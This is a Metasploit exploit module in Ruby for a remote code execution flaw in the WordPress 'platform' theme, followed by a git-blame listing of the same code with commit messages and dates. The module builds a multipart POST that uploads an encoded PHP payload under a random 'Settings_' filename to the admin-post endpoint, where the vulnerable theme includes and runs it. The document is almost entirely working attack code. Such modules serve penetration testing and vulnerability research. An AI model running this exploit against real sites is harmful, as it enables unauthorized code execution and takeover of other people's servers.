modules/exploits/unix/webapp/wp_platform_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'WordPress Platform Theme File Upload Vulnerability',
      'Description'    => %q{
        The WordPress Theme "platform" contains a remote code execution vulnerability
        through an unchecked admin_init call. The theme includes the uploaded file
        from its temp filename with php's include function.
      },
      'Author'         =>
        [
          'Marc-Alexandre Montpas', # initial discovery
          'Christian Mehlmauer'     # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html'],
          ['WPVDB', '7762']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['platform < 1.4.4, platform pro < 1.6.2', {}]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2015-01-21'))
  end

  def exploit
    filename = "Settings_#{rand_text_alpha(5)}.php"

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
    data.add_part('settings', nil, nil, 'form-data; name="settings_upload"')
    data.add_part('pagelines', nil, nil, 'form-data; name="page"')
    post_data = data.to_s

    print_status("Uploading payload")
    send_request_cgi({
      'method'   => 'POST',
      'uri'      => wordpress_url_admin_post,
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => post_data
    }, 5)
  end
end
add wordpress platform theme rce 2015-01-31 22:02:44 +01:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
add wordpress platform theme rce 2015-01-31 22:02:44 +01:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add wordpress platform theme rce 2015-01-31 22:02:44 +01:00			`Rank = ExcellentRanking`

Update moduels using Msf::HTTP::Wordpress 2015-10-15 11:47:13 -05:00			`include Msf::Exploit::Remote::HTTP::Wordpress`
add wordpress platform theme rce 2015-01-31 22:02:44 +01:00
			`def initialize(info = {})`
			`super(update_info(`
			`info,`
Change module wording to conform with other WP modules. 2015-04-20 16:48:35 +10:00			`'Name' => 'WordPress Platform Theme File Upload Vulnerability',`
add wordpress platform theme rce 2015-01-31 22:02:44 +01:00			`'Description' => %q{`
Mostly caps/grammar/spelling, GoodRanking on MBAM 2015-02-05 12:36:47 -06:00			`The WordPress Theme "platform" contains a remote code execution vulnerability`
Decrease timeout 2015-02-03 17:33:29 -06:00			`through an unchecked admin_init call. The theme includes the uploaded file`
55 pages of spelling done 2017-09-07 21:18:50 -04:00			`from its temp filename with php's include function.`
add wordpress platform theme rce 2015-01-31 22:02:44 +01:00			`},`
			`'Author' =>`
			`[`
			`'Marc-Alexandre Montpas', # initial discovery`
			`'Christian Mehlmauer' # metasploit module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`['URL', 'http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html'],`
			`['WPVDB', '7762']`
			`],`
			`'Privileged' => false,`
			`'Platform' => ['php'],`
			`'Arch' => ARCH_PHP,`
			`'Targets' => [['platform < 1.4.4, platform pro < 1.6.2', {}]],`
			`'DefaultTarget' => 0,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2015-01-21'))`
add wordpress platform theme rce 2015-01-31 22:02:44 +01:00			`end`

			`def exploit`
			`filename = "Settings_#{rand_text_alpha(5)}.php"`

			`data = Rex::MIME::Message.new`
			`data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")`
			`data.add_part('settings', nil, nil, 'form-data; name="settings_upload"')`
			`data.add_part('pagelines', nil, nil, 'form-data; name="page"')`
			`post_data = data.to_s`

Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Uploading payload")`
Decrease timeout 2015-02-03 17:33:29 -06:00			`send_request_cgi({`
add wordpress platform theme rce 2015-01-31 22:02:44 +01:00			`'method' => 'POST',`
			`'uri' => wordpress_url_admin_post,`
			`'ctype' => "multipart/form-data; boundary=#{data.bound}",`
			`'data' => post_data`
Decrease timeout 2015-02-03 17:33:29 -06:00			`}, 5)`
add wordpress platform theme rce 2015-01-31 22:02:44 +01:00			`end`
			`end`